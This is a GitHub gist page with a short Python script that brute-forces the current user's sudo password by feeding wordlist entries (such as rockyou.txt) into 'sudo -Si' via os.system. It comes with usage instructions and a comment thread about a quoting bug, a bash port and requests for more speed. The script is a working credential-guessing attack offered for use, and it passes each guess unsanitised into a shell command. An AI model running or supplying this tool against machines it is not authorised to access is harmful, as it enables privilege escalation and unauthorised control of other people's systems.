Skip to content

Instantly share code, notes, and snippets.

@ramuta
Last active April 8, 2024 05:12
Show Gist options
  • Save ramuta/e32865d911e087844fc8c526a72fea49 to your computer and use it in GitHub Desktop.
Save ramuta/e32865d911e087844fc8c526a72fea49 to your computer and use it in GitHub Desktop.
A Python script to brute force the sudo password of a current user.
# Author: Matej Ramuta
# How to use this script:
# 1. You need to have a wordlist file, something like rockyou.txt
# 2. Make sure you have Python 3 installed. Try this with "python --version" command. Also check "python3 --version"
# 3. Run the script like this: python sudo_brute_force.py passwords.txt
import os
import sys
if len(sys.argv) == 1:
print("You need to add a wordlist! Run the script like this: python sudo_brute_force.py passwords.txt")
exit()
wordfile = sys.argv[1]
print("Brute force sudo password with wordlist {}".format(wordfile))
print()
with open(wordfile, "r") as wordlist:
for password in wordlist:
print(password)
result = os.system("echo '{}' | sudo -Si".format(password.strip())) # important: strip() the newline char
if result == "0" or result == 0:
print("Success! :) The password is: {}".format(password))
break
else:
print("Wrong password... :( Let's try again!")
print()
@ramuta
Copy link
Author

ramuta commented Jan 16, 2020

Weird behavior: if a password starts with # (or maybe #1?), the script thinks it's the correct one, even though it's not.

EDIT: This is fixed now with single quotes around password in line 23.

@Nielzo-ai
Copy link

by me is the password 97885742334

@medanisjbara
Copy link

To those who are interested, I wrote a translation in bash here

@jedai47
Copy link

jedai47 commented Nov 11, 2021

it did not work for me as it took the second password in the wordlist as command ...

@Jonah1Pablow
Copy link

faisalqureshi6156

@medanisjbara
Copy link

medanisjbara commented Jul 31, 2022

@ramuta 2 years late. But if a password starts with # then the command becomes just echo with the rest being just a comment. Therefore the exit status will be 0. Effectively making your script thinks the password is correct while it's not.

A good way to solve this is to have two single quotes around the curly brackets. So line 23 should become.

        result = os.system("echo '{}' | sudo -Si".format(password.strip()))

@ramuta
Copy link
Author

ramuta commented Sep 26, 2022

@ramuta 2 years late. But if a password starts with # then the command becomes just echo with the rest being just a comment. Therefore the exit status will be 0. Effectively making your script thinks the password is correct while.

A good way to solve this is to have two single quotes around the curly brackets. So line 23 should become.

        result = os.system("echo '{}' | sudo -Si".format(password.strip()))

Thanks @medanisjbara, not sure how I missed this 🤦‍♂️ 😄

@trawn3333
Copy link

Does anyone have this working on systems that institute a delay on sudo commands? It doesn't seem to work for me in Ubuntu.

@medanisjbara
Copy link

@trawn3333 there are better ways to do this if you forgot your password. But hit me up if you still want this.

@IloveTurtles1
Copy link

is there any way to make it run faster?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment